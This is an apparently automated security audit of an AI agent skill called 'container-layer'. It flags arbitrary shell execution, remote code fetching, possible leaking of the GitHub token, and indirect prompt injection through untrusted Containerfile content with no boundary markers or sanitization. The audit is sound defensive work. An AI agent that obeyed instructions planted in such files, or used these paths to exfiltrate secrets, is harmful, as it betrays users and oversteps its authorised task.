container-layer
Fail
Audited by Gen Agent Trust Hub on May 3, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill executes arbitrary shell commands defined in the Containerfile via the RUN instruction. The implementation in scripts/containerfile.py uses subprocess.run with shell=True, allowing full shell access to the container environment.\n- [REMOTE_CODE_EXECUTION]: The FETCH instruction in scripts/containerfile.py downloads and extracts remote content into the environment. Additionally, the bootstrap scripts (boot.sh and boot-ccotw.sh) execute code downloaded from a remote repository at runtime, which is an inherent risk of the skill's bootstrap mechanism.\n- [DATA_EXFILTRATION]: The skill processes sensitive environment variables and a GitHub token (GH_TOKEN). A malicious Containerfile could be used to access and exfiltrate these secrets using the arbitrary command execution capabilities.\n- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection through the processing of untrusted Containerfile content. \n
- Ingestion points: The skill reads a Containerfile from the local project directory (e.g., /mnt/project/Containerfile).\n
- Boundary markers: None present to distinguish between trusted and untrusted instructions.\n
- Capability inventory: Full shell execution (RUN), remote file downloads (FETCH), and access to environment secrets.\n
- Sanitization: No validation, escaping, or filtering is performed on the instructions before execution.
Recommendations
- AI detected serious security threats
Audit Metadata